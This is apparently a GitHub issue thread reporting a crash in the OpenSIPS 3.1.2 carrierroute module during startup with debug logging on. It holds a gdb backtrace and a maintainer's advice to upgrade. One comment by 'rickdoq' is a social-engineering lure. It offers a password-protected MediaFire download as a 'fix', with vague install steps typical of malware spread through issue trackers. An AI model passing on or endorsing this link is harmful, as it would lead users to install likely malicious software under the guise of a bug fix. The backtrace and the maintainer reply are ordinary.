### ISSUE TITLE
[CRASH] module carrierroute crash when start opensips and open debug

### ISSUE THREAD

**Issue by garry6543121** [OpenSIPS/opensips#3456]
**OpenSIPS version you are running**

```
3.1.2
```

**Crash Core Dump**

(gdb) bt full
#0  0x00007f6127f5b703 in carrier_fixup (param=0x7f61a41ea490) at carrierroute.c:396
        __FUNCTION__ = "carrier_fixup"
#1  0x000056419096ef29 in fix_cmd (params=params@entry=0x7f6127f6fa60 <cmds+256>, elems=elems@entry=0x7f61a40fc9d0) at mod_fix.c:241
        i = 1
        param = <optimized out>
        gp = 0x7f61a41ea488
        ret = <optimized out>
        pve = 0x7f61a4230608
        re = 0x0
        h = 0x7f61a41ea498
        __FUNCTION__ = "fix_cmd"
#2  0x0000564190985483 in fix_actions (a=<optimized out>) at route.c:1273
        t = 0x7f61a40fc9c8
        ret = <optimized out>
        cmd = <optimized out>
        acmd = <optimized out>
        s = {s = 0x8 <error: Cannot access memory at address 0x8>, len = -1869065654}
        model = 0x0
        xlp = <optimized out>
        __FUNCTION__ = "fix_actions"
#3  0x0000564190986a83 in fix_expr (exp=0x7f61a40fcad8) at route.c:1067
        re = <optimized out>
        ret = -5
        __FUNCTION__ = "fix_expr"
#4  0x00005641909853ad in fix_actions (a=<optimized out>) at route.c:1188
        t = 0x7f61a40fd2a8
        ret = <optimized out>
        cmd = <optimized out>
        acmd = <optimized out>
        s = {s = 0x7f61a40f6dd0 "($ci) cache_fetch  ($(td{s.escape.common})_$(tU{s.escape.common})_sn)\n", len = 70}
        model = 0x7f61a422e560
        xlp = <optimized out>
        __FUNCTION__ = "fix_actions"
#5  0x000056419098e7a6 in fix_rls () at route.c:1410
        i = 0
        ret = <optimized out>
--Type <RET> for more, q to quit, c to continue without paging--
#6  0x00005641908ed812 in main (argc=<optimized out>, argv=<optimized out>) at main.c:1496
        c = <optimized out>
        r = <optimized out>
        tmp = 0x7ffd1908270c ""
        tmp_len = <optimized out>
        port = <optimized out>
        proto = <optimized out>
        protos_no = <optimized out>
        options = 0x564190b5b9f0 "f:cCm:M:b:l:n:N:rRvdDFEVhw:t:u:g:p:P:G:W:o:a:k:s:"
        seed = 1944467758
        rfd = <optimized out>
        __FUNCTION__ = "main"
(gdb) f 0
#0  0x00007f6127f5b703 in carrier_fixup (param=0x7f61a41ea490) at carrierroute.c:396
396	in carrierroute.c
(gdb) p *param
$1 = (void *) 0x1
(gdb) 

**Describe the traffic that generated the bug**

**To Reproduce**

opensips.cfg has the following configurations
log_level=5
xlog_level=3

**Relevant System Logs**

**OS/environment information**
 - Operating System: 
 - OpenSIPS installation: 
 - other relevant information:

**Additional context**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bogdan-iancu** [comment]
@garry6543121 , the 3.1 version in no longer maintained (see [here](https://opensips.org/About/AvailableVersions). Maybe you consider an upgrade to 3.4 ?
